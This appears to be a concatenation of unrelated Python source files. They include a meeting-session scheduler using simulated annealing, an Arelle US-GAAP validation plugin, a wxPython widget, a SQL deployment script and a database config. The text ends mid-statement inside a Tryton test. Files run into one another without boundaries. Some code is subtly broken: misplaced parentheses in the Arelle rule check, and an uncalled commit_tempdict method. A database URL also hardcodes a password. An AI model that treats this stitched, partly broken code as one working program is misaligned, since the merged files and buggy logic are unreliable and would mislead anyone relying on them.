iterkeys(self): return self.current_assignments.__iter__() def add_to_available_slot(self, fs): size = len(self.available_slots) if fs.session is not None: fs.session.setup_conflicts() time_column = None needs_to_be_added = True #print "adding fs for slot: %s" % (fs.timeslot) if fs.timeslot is not None: if fs.timeslot in self.fs_by_timeslot: ofs = self.fs_by_timeslot[fs.timeslot] #print " duplicate timeslot[%s], updating old one: %s" % (ofs.available_slot, fs.timeslot) if ofs.session is None: # keep the one with the assignment. self.fs_by_timeslot[fs.timeslot] = fs # get rid of old item fs.available_slot = ofs.available_slot self.available_slots[ofs.available_slot] = fs needs_to_be_added = False else: self.fs_by_timeslot[fs.timeslot] = fs # add the slot to the list of vertical slices. time_column = self.timeslots[fs.timeslot.time] #group_name = "empty" #if fs.session is not None: # group_name = fs.session.group.acronym #print " inserting fs %s / %s to slot: %s" % (fs.timeslot.location.name, # group_name, # time_column.daytime) fs.scheduleslot = time_column if fs.session is None: self.placed_scheduleslots.append(fs) else: time_column = self.unplaced_scheduledslots fs.scheduleslot = self.unplaced_scheduledslots if needs_to_be_added: self.total_slots = size self.available_slots.append(fs) fs.available_slot = size if time_column is not None: # needs available_slot to be filled in time_column.add_assignment(fs) #print "adding item: %u to unplaced slots (pinned: %s)" % (fs.available_slot, fs.pinned) def __init__(self, schedule, seed=None): # initialize available_slots with the places that a session can go based upon the # schedtimesessassignment objects of the provided schedule. # for each session which is not initially scheduled, also create a schedtimesessassignment # that has a session, but no timeslot. self.recordsteps = True self.debug_badness = False self.lastSaveTime = datetime.now() self.lastSaveStep = 0 self.verbose = False # this maps a *group* to a list of (session,location) pairs, using FakeSchedTimeSessAssignment self.current_assignments = {} self.tempdict = {} # used when calculating badness. # this contains an entry for each location, and each un-location in the form of # (session,location) with the appropriate part None. self.fs_by_timeslot = {} self.available_slots = [] self.unplaced_scheduledslots = UnplacedScheduleSlot() self.placed_scheduleslots = [] self.sessions = {} self.total_slots = 0 self.schedule = schedule self.meeting = schedule.meeting self.seed = seed self.badness = schedule.badness self.random_generator=Random() self.random_generator.seed(seed) self.temperature = 10000000 self.stepnum = 1 self.timeslots = {} self.slot1 = None self.slot2 = None # setup up array of timeslots objects for timeslot in schedule.meeting.timeslot_set.filter(type = "session").all(): if not timeslot.time in self.timeslots: self.timeslots[timeslot.time] = ScheduleSlot(timeslot.time) fs = FakeSchedTimeSessAssignment(self.schedule) fs.timeslot = timeslot self.add_to_available_slot(fs) self.timeslots[None] = self.unplaced_scheduledslots # make list of things that need placement. for sess in self.meeting.sessions_that_can_be_placed().all(): fs = FakeSchedTimeSessAssignment(self.schedule) fs.session = sess self.sessions[sess] = fs self.current_assignments[sess.group] = [] #print "Then had %u" % (self.total_slots) # now find slots that are not empty. # loop here and the one for useableslots could be merged into one loop allschedsessions = self.schedule.qs_assignments_with_sessions.filter(timeslot__type = "session").all() for ss in allschedsessions: # do not need to check for ss.session is not none, because filter above only returns those ones. sess = ss.session if not (sess in self.sessions): #print "Had to create sess for %s" % (sess) self.sessions[sess] = FakeSchedTimeSessAssignment(self.schedule) fs = self.sessions[sess] #print "Updating %s from %s(%s)" % (fs.session.group.acronym, ss.timeslot.location.name, ss.timeslot.time) fs.fromSchedTimeSessAssignment(ss) # if pinned, then do not consider it when selecting, but it needs to be in # current_assignments so that conflicts are calculated. if not ss.pinned: self.add_to_available_slot(fs) else: del self.sessions[sess] self.current_assignments[ss.session.group].append(fs) # XXX can not deal with a session in two slots yet?! # need to remove any sessions that might have gotten through above, but are in non-session # places, otherwise these could otherwise appear to be unplaced. allspecialsessions = self.schedule.qs_assignments_with_sessions.exclude(timeslot__type = "session").all() for ss in allspecialsessions: sess = ss.session if sess is None: continue if (sess in self.sessions): del self.sessions[sess] # now need to add entries for those sessions which are currently unscheduled (and yet not pinned) for sess,fs in self.sessions.iteritems(): if fs.timeslot is None: #print "Considering sess: %s, and loc: %s" % (sess, str(fs.timeslot)) self.add_to_available_slot(fs) #import pdb; pdb.set_trace() # do initial badness calculation for placement that has been done for daytime,scheduleslot in self.timeslots.iteritems(): scheduleslot.recalc_badness(self) def dump_available_slot_state(self): for fs in self.available_slots: shortname="unplaced" sessid = 0 if fs.session is not None: shortname=fs.session.short_name sessid = fs.session.id pinned = "unplaced" ssid=0 if fs.origss is not None: pinned = fs.origss.pinned ssid = fs.origss.id print "%s: %s[%u] pinned: %s ssid=%u" % (fs.available_slot, shortname, sessid, pinned, ssid) def pick_initial_slot(self): if self.unplaced_scheduledslots.finished(): self.initial_stage = False if self.initial_stage: item = self.unplaced_scheduledslots.get_unplaced_slot_number() slot1 = self.available_slots[item] #print "item: %u points to %s" % (item, slot1) else: slot1 = self.random_generator.choice(self.available_slots) return slot1 def pick_second_slot(self): if self.initial_stage and len(self.placed_scheduleslots)>0: self.random_generator.shuffle(self.placed_scheduleslots) slot2 = self.placed_scheduleslots[0] del self.placed_scheduleslots[0] else: slot2 = self.random_generator.choice(self.available_slots) return slot2 def pick_two_slots(self): slot1 = self.pick_initial_slot() slot2 = self.pick_second_slot() tries = 100 self.repicking = 0 # 1) no point in picking two slots which are the same. # 2) no point in picking two slots which have no session (already empty) # 3) no point in picking two slots which are both unscheduled sessions # 4) limit outselves to ten tries. while (slot1 == slot2 or slot1 is None or slot2 is None or (slot1.session is None and slot2.session is None) or (slot1.timeslot is None and slot2.timeslot is None) ) and tries > 0: self.repicking += 1 #print "%u: .. repicking slots, had: %s and %s" % (self.stepnum, slot1, slot2) slot1 = self.pick_initial_slot() slot2 = self.pick_second_slot() tries -= 1 if tries == 0: raise PlacementException("How can it pick the same slot ten times in a row") if slot1.pinned: raise PlacementException("Should never attempt to move pinned slot1") if slot2.pinned: raise PlacementException("Should never attempt to move pinned slot2") return slot1, slot2 # this assigns a session to a particular slot. def assign_session(self, session, fslot, doubleup=False): import copy if session is None: # we need to unschedule the session session = fslot.session self.tempdict[session.group] = [] return if not session in self.sessions: raise PlacementException("Is there a legit case where session is not in sessions here?") oldfs = self.sessions[session] # find the group mapping. pairs = copy.copy(self.current_assignments[session.group]) #print "pairs is: %s" % (pairs) if oldfs in pairs: which = pairs.index(oldfs) del pairs[which] #print "new pairs is: %s" % (pairs) self.sessions[session] = fslot # now fix up the other things. pairs.append(fslot) self.tempdict[session.group] = pairs def commit_tempdict(self): for key,value in self.tempdict.iteritems(): self.current_assignments[key] = value self.tempdict = dict() # calculate badness of the columns which have changed def calc_badness(self, slot1, slot2): badness = 0 for daytime,scheduleslot in self.timeslots.iteritems(): oldbadness = scheduleslot.badness if oldbadness is None: oldbadness = 0 recalc="" if slot1 is not None and slot1.scheduleslot == scheduleslot: recalc="recalc slot1" scheduleslot.recalc_badness(self) if slot2 is not None and slot2.scheduleslot == scheduleslot: recalc="recalc slot2" scheduleslot.recalc_badness(self) newbadness = scheduleslot.calc_badness(self) if self.debug_badness: print " calc: %s %u %u %s" % (scheduleslot.daytime, oldbadness, newbadness, recalc) badness += newbadness return badness def try_swap(self): badness = self.badness slot1,slot2 = self.pick_two_slots() if self.debug_badness: print "start\n slot1: %s.\n slot2: %s.\n badness: %s" % (slot1, slot2,badness) self.slot1 = slot1 self.slot2 = slot2 #import pdb; pdb.set_trace() #self.assign_session(slot2.session, slot1, False) #self.assign_session(slot1.session, slot2, False) # self can substitute for current_assignments thanks to getitem() above. newbadness = self.calc_badness(slot1, slot2) if self.debug_badness: print "end\n slot1: %s.\n slot2: %s.\n badness: %s" % (slot1, slot2, newbadness) return newbadness def log_step(self, accepted_str, change, dice, prob): acronym1 = "empty" if self.slot1.session is not None: acronym1 = self.slot1.session.group.acronym place1 = "nowhere" if self.slot1.timeslot is not None: place1 = str(self.slot1.timeslot.location.name) acronym2= "empty" if self.slot2.session is not None: acronym2 = self.slot2.session.group.acronym place2 = "nowhere" if self.slot2.timeslot is not None: place2 = str(self.slot2.timeslot.location.name) initial = " " if self.initial_stage: initial = "init" # note in logging: the swap has already occured, but the values were set before if self.verbose: print "% 5u:%s %s temp=%9u delta=%+9d badness=%10d dice=%.4f <=> prob=%.4f (repicking=%u) %9s:[%8s->%8s], %9s:[%8s->%8s]" % (self.stepnum, initial, accepted_str, self.temperature, change, self.badness, dice, prob, self.repicking, acronym1, place2, place1, acronym2, place1, place2) def do_step(self): self.stepnum += 1 newbadness = self.try_swap() if self.badness is None: self.commit_tempdict self.badness = newbadness return True, 0 change = newbadness - self.badness prob = self.calc_probability(change) dice = self.random_generator.random() #self.log_step("consider", change, dice, prob) if dice < prob: accepted_str = "accepted" accepted = True # swap things as planned self.commit_tempdict # actually do the swap in the FS tmp = self.slot1.session self.slot1.session = self.slot2.session self.slot2.session = tmp self.badness = newbadness # save state object else: accepted_str = "rejected" accepted = False self.tempdict = dict() self.log_step(accepted_str, change, dice, prob) if accepted and not self.initial_stage: self.temperature = self.temperature * 0.9995 return accepted, change def calc_probability(self, change): import math return 1/(1 + math.exp(float(change)/self.temperature)) def delete_available_slot(self, number): # because the numbers matter, we just None things out, and let repicking # work on things. #last = len(self.available_slots)-1 #if number < last: # self.available_slots[number] = self.available_slots[last] # self.available_slots[last].available_slot = number # #del self.available_slots[last] self.available_slots[number] = None def do_steps(self, limit=None, monitorSchedule=None): print "do_steps(%s,%s)" % (limit, monitorSchedule) if self.badness is None or self.badness == 0: self.badness = self.schedule.calc_badness1(self) self.oldbadness = self.badness while (limit is None or self.stepnum < limit) and self.temperature > 1000: accepted,change = self.do_step() #set_prompt_wait(True) if not accepted and self.initial_stage: # randomize again! self.unplaced_scheduledslots.shuffle(self.random_generator) if accepted and self.initial_stage and self.unplaced_scheduledslots.count>0: # delete it from available slots, so as not to leave unplaced slots self.delete_available_slot(self.slot1.available_slot) # remove initial slot from list. self.unplaced_scheduledslots.delete_first() if False and accepted and self.recordsteps: ass1 = AutomaticScheduleStep() ass1.schedule = self.schedule if self.slot1.session is not None: ass1.session = self.slot1.session if self.slot1.origss is not None: ass1.moved_to = self.slot1.origss ass1.stepnum = self.stepnum ass1.save() ass2 = AutomaticScheduleStep() ass2.schedule = self.schedule if self.slot2.session is not None: ass2.session = self.slot2.session if self.slot2.origss is not None: ass2.moved_to = self.slot2.origss ass2.stepnum = self.stepnum ass2.save() #print "%u: accepted: %s change %d temp: %d" % (self.stepnum, accepted, change, self.temperature) if (self.stepnum % 1000) == 0 and monitorSchedule is not None: self.saveToSchedule(monitorSchedule) print "Finished after %u steps, badness = %u->%u" % (self.stepnum, self.oldbadness, self.badness) def saveToSchedule(self, targetSchedule): when = datetime.now() since = 0 rate = 0 if targetSchedule is None: targetSchedule = self.schedule else: # XXX more stuff to do here, setup mapping, copy pinned items pass if self.lastSaveTime is not None: since = when - self.lastSaveTime if since.microseconds > 0: rate = 1000 * float(self.stepnum - self.lastSaveStep) / (1000*since.seconds + since.microseconds / 1000) print "%u: saved to schedule: %s %s elapsed=%s rate=%.2f" % (self.stepnum, targetSchedule.name, when, since, rate) self.lastSaveTime = datetime.now() self.lastSaveStep = self.stepnum # first, remove all assignments in the schedule. for ss in targetSchedule.assignments.all(): if ss.pinned: continue ss.delete() # then, add new items for new placements. for fs in self.available_slots: if fs is None: continue ss = SchedTimeSessAssignment(timeslot = fs.timeslot, schedule = targetSchedule, session = fs.session) ss.save() def do_placement(self, limit=None, targetSchedule=None): self.badness = self.schedule.calc_badness1(self) if limit is None: limitstr = "unlimited " else: limitstr = "%u" % (limit) print "Initial stage (limit=%s) starting with: %u items to place" % (limitstr, self.unplaced_scheduledslots.count) # permute the unplaced sessions self.unplaced_scheduledslots.shuffle(self.random_generator) self.initial_stage = True monitorSchedule = targetSchedule if monitorSchedule is None: monitorSchedule = self.schedule self.do_steps(limit, monitorSchedule) self.saveToSchedule(targetSchedule) # # this does not clearly have value at this point. # Not worth a migration/table yet. # if False: class AutomaticScheduleStep(models.Model): schedule = models.ForeignKey('Schedule', null=False, blank=False, help_text=u"Who made this agenda.") session = models.ForeignKey('Session', null=True, default=None, help_text=u"Scheduled session involved.") moved_from = models.ForeignKey('SchedTimeSessAssignment', related_name="+", null=True, default=None, help_text=u"Where session was.") moved_to = models.ForeignKey('SchedTimeSessAssignment', related_name="+", null=True, default=None, help_text=u"Where session went.") stepnum = models.IntegerField(default=0, blank=True, null=True) # -*- coding: utf-8 -*- #Based on txt file import re import string import nltk from nltk.tokenize import word_tokenize def num_ratio(path): #read in the test data line by line(list of each line) filename= path lineList = [line.rstrip('\n') for line in open(filename)] #calculate the empty rows in the list empty_row_ratio=sum(x is '' for x in lineList)/len(lineList) # remove punctuation stripped = [w.translate(str.maketrans('', '', string.punctuation)) for w in lineList] #split words separated_words = word_tokenize(' '.join(stripped)) #Distinguish numbers and calculte ratio num_ratio=len([x for x in separated_words if x.isdigit()])/len(separated_words) return empty_row_ratio,num_ratio num_ratio('Cumberland County (ME)_FY2013-pages-40.txt') <reponame>FedorSmirnov89/FunctionTemplate import json from .cloud_function import cloud_function # Wrapper for OpenFaaS def handle(event): req_json = json.loads(event) return cloud_function(req_json) from arelle import PluginManager from arelle.ModelValue import qname def setup(val): if 'http://fasb.org/us-gaap/2011-01-31' in val.modelXbrl.namespaceDocs: nsTbl = {None: 'http://fasb.org/us-gaap/2011-01-31', 'country' : 'http://xbrl.sec.gov/country/2011-01-31', 'currency': 'http://xbrl.sec.gov/currency/2011-01-31', 'dei': 'http://xbrl.sec.gov/dei/2011-01-31', 'exch': 'http://xbrl.sec.gov/exch/2011-01-31', 'invest': 'http://xbrl.sec.gov/invest/2011-01-31', 'naics': 'http://xbrl.sec.gov/naics/2011-01-31', 'sic': 'http://xbrl.sec.gov/sic/2011-01-31', 'stpr': 'http://xbrl.sec.gov/stpr/2011-01-31', 'us-types': 'http://fasb.org/us-types/2011-01-31', 'nonnum': 'http://www.xbrl.org/dtr/type/non-numeric', 'num': 'http://www.xbrl.org/dtr/type/numeric'} elif 'http://xbrl.us/us-gaap/2009-01-31' in val.modelXbrl.namespaceDocs: nsTbl = {None: 'http://xbrl.us/us-gaap/2009-01-31', 'ar': 'http://xbrl.us/ar/2009-01-31', 'country': 'http://xbrl.us/country/2009-01-31', 'currency': 'http://xbrl.us/currency/2009-01-31', 'exch': 'http://xbrl.us/exch/2009-01-31', 'invest': 'http://xbrl.us/invest/2009-01-31', 'mda': 'http://xbrl.us/mda/2009-01-31', 'mr': 'http://xbrl.us/mr/2009-01-31', 'naics': 'http://xbrl.us/naics/2009-01-31', 'seccert': 'http://xbrl.us/seccert/2009-01-31', 'sec': 'http://xbrl.us/sic/2009-01-31', 'stpr': 'http://xbrl.us/stpr/2009-01-31', 'dei': 'http://xbrl.us/dei/2009-01-31', 'us-types': 'http://xbrl.us/us-types/2009-01-31'} def q(n): return qname(n, nsTbl) ''' matching table localName: ( inclusion(dim, mbr), exclusion(dim,mbr), ruleFunction, error code, err descr ) ''' def isNegative(f): return f.xValue < 0 val.usgaapRules = { q("PaymentsToAcquireNotesReceivable"): ( None, None, isNegative, "xbrlus-cc.cf.nonneg.4291", "may not be nonnegative" ), q("StockholdersEquityIncludingPortionAttributableToNoncontrollingInterest"): ( ((q("StatementEquityComponentsAxis"),q("PreferredStockMember")), ), None, isNegative, "xbrlus-cc.she.nonneg.2", "may not be nonnegative"), q("FairValueAssetsMeasuredOnRecurringBasisLoansReceivable"): ( None, ((q("dei:LegalEntityAxis"),q("ConsolidationEliminationsMember")), (q("StatementBusinessSegmentsAxis"),q("ConsolidationEliminationsMember")), (q("StatementBusinessSegmentsAxis"),q("BusinessIntersegmentEliminationsMember")), (q("SegmentReportingInformationBySegmentAxis"),q("BusinessIntersegmentEliminationsMember")), (q("StatementGeographicalAxis"),q("GeographicalIntersegmentEliminationsMember")), (q("ErrorCorrectionsAndPriorPeriodAdjustmentsRestatementByRestatementPeriodAndAmountAxis"),q("RestatementAdjustmentMember")), (q("NewAccountingPronouncementsOrChangeInAccountingPrincipleByTypeOfChangeAxis"),q("RestatementAdjustmentMember")), (q("StatementScenarioAxis"),q("ScenarioAdjustmentMember")), (q("EffectOfFourthQuarterEventsByTypeAxis"),q("YearEndAdjustmentMember")), ), isNegative, "xbrlus-cc.fv.nonneg.9329", "may not be nonnegative") } def factCheck(val, fact): if fact.qname in val.usgaapRules: inclDimMems, exclDimMems, ruleFunction, errCode, descr = val.usgaapRules[fact.qname] if (all(fact.context.dimMemberQname(dimMem[0]) == dimMem[1]) for dimMem in (inclDimMems or []) and not any(fact.context.dimMemberQname(dimMem[0]) == dimMem[1]) for dimMem in (exclDimMems or []) and ruleFunction(fact)): val.modelXbrl.error(errCode, _("%(fact)s in context %(contextID)s %(descr)s"), modelObject=fact, fact=fact.qname, contextID=fact.contextID, descr=descr) def final(val): pass __pluginInfo__ = { # Do not use _( ) in pluginInfo itself (it is applied later, after loading 'name': 'US-GAAP Consistency Tests', 'version': '0.9', 'description': '''US-GAAP consistency tests. Includes non-negative rules.''', 'license': 'Apache-2', 'author': '<NAME>', 'copyright': '(c) Copyright 2012 Mark V Systems Limited, All rights reserved.', # classes of mount points (required) 'Validate.EFM.Start': setup, 'Validate.EFM.Fact': factCheck, 'Validate.EFM.Finally': final } ########################################################################## # MediPy - Copyright (C) Universite de Strasbourg # Distributed under the terms of the CeCILL-B license, as published by # the CEA-CNRS-INRIA. Refer to the LICENSE file or to # http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html # for details. ########################################################################## import math import wx import medipy.base class ImageSerie(wx.Panel, medipy.base.Observable): """ Control allowing the user to choose an item from a list of objects of type "list of medipy.base.Image". If output is True, then a "(new)" checkbox will be displayed ; when checked, the value of the control will be set to None, and it will be the caller's responsibility to perform the necessary actions. If may_be_empty is True, then a "(none)" checkbox will be displayed ; when checked, the value of the control will be set to None. """ def __init__(self, parent, choices, value=None, output=False, output_checked=False, may_be_empty=False, may_be_empty_checked=False, *args, **kwargs): self._choices = None self._value = None self._default_value = None # Initialize wx.Panel.__init__(self, parent, *args, **kwargs) medipy.base.Observable.__init__(self, ["value"]) # Widgets self._new_checkbox = wx.CheckBox(self, label="(new)") self._empty_checkbox = wx.CheckBox(self, label="(none)") # Layout sizer = wx.BoxSizer(wx.VERTICAL) self._radiobuttons_sizer = wx.GridSizer() sizer.Add(self._empty_checkbox) sizer.Add(self._radiobuttons_sizer) sizer.Add(self._new_checkbox) self.SetSizer(sizer) # Events self._new_checkbox.Bind(wx.EVT_CHECKBOX, self.OnNewCheckBox) self._empty_checkbox.Bind(wx.EVT_CHECKBOX, self.OnEmptyCheckBox) self.value = value self.default_value = value self.choices = choices self.output = output self.output_checked = output_checked self.may_be_empty = may_be_empty self.may_be_empty_checked = may_be_empty_checked self.validate() def validate(self): valid = (self.output_checked or self.may_be_empty_checked or (self._value is not None and self._value in [id(x) for x in self.choices])) if valid : self.SetBackgroundColour(None) else : self.SetBackgroundColour(wx.RED) return valid def reset(self): """ Reset the current choice to the default value, uncheck the "(new)" and "(none)" checkboxes. """ self.output_checked = False self.may_be_empty_checked = False self.value = self.default_value self.validate() def update_gui(self): """ Update the GUI to reflect the current state of the control (value, choices, output parameters and may_be_empty parameters). """ if self._choices is None : return self._radiobuttons_sizer.Clear(True) # Re-shape the sizer to be as square as possible nb_objects = len(self.choices) rows = max(math.sqrt(len(self.choices)),1) rows = math.ceil(rows) self._radiobuttons_sizer.SetRows(rows) self._radiobuttons_sizer.SetCols(rows) if len(self.choices) == 0 : label = wx.StaticText(self, label="(no image loaded)") font = label.GetFont() font.SetStyle(wx.FONTSTYLE_ITALIC) label.SetFont(font) self._radiobuttons_sizer.Add(label, 1, wx.EXPAND) else : style=wx.RB_GROUP for i, choice in enumerate(self.choices) : button = wx.RadioButton(self, -1, str(i+1), style=style) style=0 button.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton) self._radiobuttons_sizer.Add(button, 0) is_image_list = ( isinstance(choice, (list, medipy.base.ObservableList)) and all([isinstance(x, medipy.base.Image) for x in choice])) button.Enable(is_image_list and not self.output_checked and not self.may_be_empty_checked) ids = [id(x) for x in self.choices] try : index = ids.index(self._value) except ValueError : # No such value, just keep the current button checked pass else : button = self._radiobuttons_sizer.GetChildren()[index].GetWindow() button.SetValue(True) self.Layout() ############## # Properties # ############## def _get_value(self): """ The chosen Image from the list, or None if either the "(new)" checkbox or the "(none)" checkbox is checked. """ if self._value is None : return self._value else : ids = [id(x) for x in self.choices] index = ids.index(self._value) return self._choices[index] def _set_value(self, value): if value is not None : ids = [id(x) for x in self.choices] if id(value) in ids : self._value = id(value) else : self._value = None else : self._value = None self.update_gui() self.validate() self.notify_observers("value") def _get_default_value(self): """ The default value of the control, used when resetting. """ return self._default_value def _set_default_value(self, default_value): if default_value is not None : ids = [id(x) for x in self.choices] if id(default_value) in ids : self._default_value = id(default_value) else : self._default_value = None else : self._default_value = None def _get_choices(self): """ The list of choices displayed by the control. If this is an ObservableList, then the control will become an observer of the list and update when the list is modified. Otherwise, update_gui must be called explicitly. """ return self._choices def _set_choices(self, choices): if isinstance(self._choices, medipy.base.ObservableList) : self._choices.remove_observer("any", self._on_choices_modified) self._choices = choices if isinstance(self._choices, medipy.base.ObservableList) : self._choices.add_observer("any", self._on_choices_modified) self.update_gui() self.validate() def _get_output(self): """ The visibility of the "(new)" checkbox. """ return self._new_checkbox.IsShown() def _set_output(self, output): self._new_checkbox.Show(output) self.Layout() self.validate() def _get_output_checked(self): """ Is the "(new)" checkbox checked ? """ return self._new_checkbox.IsShown() and self._new_checkbox.IsChecked() def _set_output_checked(self, output_checked): if output_checked : self.value = None else : if self.choices : self.value = self.choices[0] else : self.value = None self._new_checkbox.SetValue(output_checked) self.update_gui() self.validate() def _get_may_be_empty(self): """ The visibility of the "(none)" checkbox. """ return self._empty_checkbox.IsShown() def _set_may_be_empty(self, may_be_empty): self._empty_checkbox.Show(may_be_empty) self.Layout() self.validate() def _get_may_be_empty_checked(self): """ Is the "(none)" checkbox checked ? """ return self._empty_checkbox.IsShown() and self._empty_checkbox.IsChecked() def _set_may_be_empty_checked(self, may_be_empty_checked): if may_be_empty_checked : self.value = None else : if self.choices : self.value = self.choices[0] else : self.value = None self._empty_checkbox.SetValue(may_be_empty_checked) self.update_gui() self.validate() value = property(_get_value, _set_value) default_value = property(_get_default_value, _set_default_value) choices = property(_get_choices, _set_choices) output = property(_get_output, _set_output) output_checked = property(_get_output_checked, _set_output_checked) may_be_empty = property(_get_may_be_empty, _set_may_be_empty) may_be_empty_checked = property(_get_may_be_empty_checked, _set_may_be_empty_checked) ################## # Event handlers # ################## def OnRadioButton(self, event): index = int(event.GetEventObject().GetLabel())-1 self._set_value(self._choices[index]) def OnNewCheckBox(self, event): if self.output_checked : self.value = None else : if self._choices : self.value = self._choices[0] else : self.value = None self.update_gui() self.validate() event.Skip() def OnEmptyCheckBox(self, event): if self.may_be_empty_checked : self.value = None else : if self._choices : self.value = self._choices[0] else : self.value = None self.update_gui() self.validate() event.Skip() def _on_choices_modified(self, event): if self.choices and not self.output_checked and not self.may_be_empty_checked : self.value = self.choices[0] self.update_gui() self.validate() """Code for reading and writing scansion text-format protocol buffers.""" from google.protobuf import text_format # type: ignore from . import scansion_pb2 # type: ignore # TODO(kbg): Add read and write functions for Verse messages, if needed. def read_document(path: str) -> scansion_pb2.Document: """Reads document message from file. Args: path: file path to read from. Returns: A parsed document message. """ document = scansion_pb2.Document() with open(path, "r") as source: text_format.ParseLines(source, document) return document def write_document(document: scansion_pb2.Document, path: str) -> None: """Writes docuemnt message to file. Args: document: the document message to write path: file path to write to. """ with open(path, "w") as sink: text_format.PrintMessage(document, sink, as_utf8=True) <reponame>JoelBondurant/RandomCodeSamples<filename>python/deploySQL.py # A script to execute all the SQL DDL scripts which are needed in addition to what JPA does. import pyodbc, os, sys, time if (len(sys.argv) <= 1): databaseServer = 'SASERVER1\SQL2008R2' databaseName = 'imDev' userName = 'REMOVED' password = '<PASSWORD>' scriptPath = '.' else: [scriptPath,databaseServer,databaseName,userName,password] = sys.argv[1:] os.chdir(scriptPath) dbConnectionString = "DRIVER={SQL Server};" dbConnectionString += "SERVER=" + databaseServer + ";" dbConnectionString += "DATABASE=" + databaseName + ";" dbConnectionString += "UID=" + userName + ";" dbConnectionString += "PWD=" + password #print(dbConnectionString) cnxn = pyodbc.connect(dbConnectionString) printSQL = False printNothing = True printAllExceptions = False tablePath = "../SQL/Tables/" viewPath = "../SQL/Views/" procPath = "../SQL/StoredProcs/" functionPath = "../SQL/Functions/" def executeSQL(fileName, sql): try: cursor = cnxn.cursor() cursor.execute(sql) cursor.close() cnxn.commit() except: err = sys.exc_info() if ((not printNothing) and printAllExceptions): print(err) elif ((not printNothing) and (-1 == str(err[1]).find("already"))): print(err) def executePath(path): fileNames = os.listdir(path) for fileName in fileNames: if (not fileName.endswith(".sql")): continue f = open(path + fileName, "r") sql = f.read() f.close() msg = "Executing " + fileName if (printSQL): msg += ":\n" + sql if (not printNothing): print(msg) executeSQL(fileName, sql) executePath(tablePath) executePath(viewPath) executePath(procPath) executePath(functionPath) cnxn.close() <reponame>chauanphu/P-Wallet<gh_stars>0 import imp from sqlalchemy import create_engine from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker SQLALCHEMY_DATABASE_URL = 'postgresql://admin:1@db:5432/billiard' engine = create_engine( SQLALCHEMY_DATABASE_URL ) sessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine) Base = declarative_base()# -*- coding: utf-8 -*- """ tests/test_views_depends.py :copyright: (C) 2014 by Openlabs Technologies & Consulting (P) Limited :license: BSD, see LICENSE for more details. """ import unittest from datetime import date from decimal import Decimal from trytond.tests.test_tryton import DB_NAME, USER, CONTEXT, POOL import trytond.tests.test_tryton from trytond.transaction import Transaction class TestShipmentCostCap(unittest.TestCase): """ Test Shipment Cost Cap """ def setUp(self): """ Set up data used in the tests. """ trytond.tests.test_tryton.install_module('sale_shipment_cost_cap') self.Currency = POOL.get('currency.currency') self.Company = POOL.get('company.company') self.Party = POOL.get('party.party') self.User = POOL.get('res.user') self.Country = POOL.get('country.country') self.SubDivision = POOL.get('country.subdivision') self.Carrier = POOL.get('carrier') def _create_coa_minimal(self, company): """Create a minimal chart of accounts """ AccountTemplate = POOL.get('account.account.template') Account = POOL.get('account.account') account_create_chart = POOL.get( 'account.create_chart', type="wizard" ) account_template, = AccountTemplate.search( [('parent', '=', None)] ) session_id, _, _ = account_create_chart.create() create_chart = account_create_chart(session_id) create_chart.account.account_template = account_template create_chart.account.company = company create_chart.transition_create_account() receivable, = Account.search([ ('kind', '=', 'receivable'), ('company', '=', company), ]) payable, = Account.search([ ('kind', '=', 'payable'), ('company', '=', company), ]) create_chart.properties.company = company create_chart.properties.account_receivable = receivable create_chart.properties.account_payable = payable create_chart.transition_create_properties() def _get_account_by_kind(self, kind, company=None, silent=True): """Returns an account with given spec :param kind: receivable/payable/expense/revenue :param silent: dont raise error if account is not found """ Account = POOL.get('account.account') Company = POOL.get('company.company') if company is None: company, = Company.search([], limit=1) accounts = Account.search([ ('kind', '=', kind), ('company', '=', company) ], limit=1) if not accounts and not silent: raise Exception("Account not found") return accounts[0] if accounts else False def _create_payment_term(self): """Create a simple payment term with all advance """ PaymentTerm = POOL.get('account.invoice.payment_term') return PaymentTerm.create([{ 'name': 'Direct', 'lines': [('create', [{'type': 'remainder'}])] }])[0] def setup_defaults(self): """ Setup the defaults """ User = POOL.get('res.user') Uom = POOL.get('product.uom') Template = POOL.get('product.template') Product = POOL.get('product.product') SaleConfig = POOL.get('sale.configuration') self.usd, = self.Currency.create([{ 'name': 'US Dollar', 'code': 'USD', 'symbol': '$', }]) with Transaction().set_context(company=None): self.party, = self.Party.create([{ 'name': 'Openlabs', }]) self.company, = self.Company.create([{ 'party': self.party.id, 'currency': self.usd }]) User.write( [User(USER)], { 'main_company': self.company.id, 'company': self.company.id, } ) self._create_coa_minimal(company=self.company.id) self.account_revenue = self._get_account_by_kind('revenue') self.account_expense = self._get_account_by_kind('expense') self._create_payment_term() carrier_party, = self.Party.create([{ 'name': 'Carrier Party', }]) self.party1, = self.Party.create([{ 'name': 'Test party', 'addresses': [('create', [{ 'city': 'Melbourne', }])], }]) self.uom, = Uom.search([('name', '=', 'Unit')]) self.template1, = Template.create([{ 'name': 'product', 'type': 'goods', 'list_price': Decimal('10'), 'cost_price': Decimal('5'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 'account_revenue': self.account_revenue.id, }]) self.template2, = Template.create([{ 'name': 'product2', 'type': 'goods', 'list_price': Decimal('20'), 'cost_price': Decimal('5'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 'account_revenue': self.account_revenue.id, }]) self.product1, = Product.create([{ 'template': self.template1.id, }]) self.product2, = Product.create([{ 'template': self.template2.id, }]) self.shipping_template, = Template.create([{ 'name': 'shipment', 'type': 'service', 'list_price': Decimal('20'), 'cost_price': Decimal('5'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 'account_revenue': self.account_revenue.id, }]) self.shipping_product, = Product.create([{ 'template': self.shipping_template.id, }]) self.carrier_product_temp, = Template.create([{ 'name': 'carrier_produict', 'type': 'service', 'list_price': Decimal('1'), 'cost_price': Decimal('1'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 'account_revenue': self.account_revenue.id, }]) carrier_product, = Product.create([{ 'template': self.carrier_product_temp.id, }]) self.carrier, = self.Carrier.create([{ 'party': carrier_party, 'carrier_product': carrier_product, }]) SaleConfig.write([SaleConfig(1)], { 'sale_carrier': self.carrier.id, 'sale_invoice_method': 'shipment', 'sale_shipment_method': 'order', 'sale_shipment_cost_method': 'shipment_capped', }) def test0010_single_shipment_cost(self): """ Check if single invoice on single shipment """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = 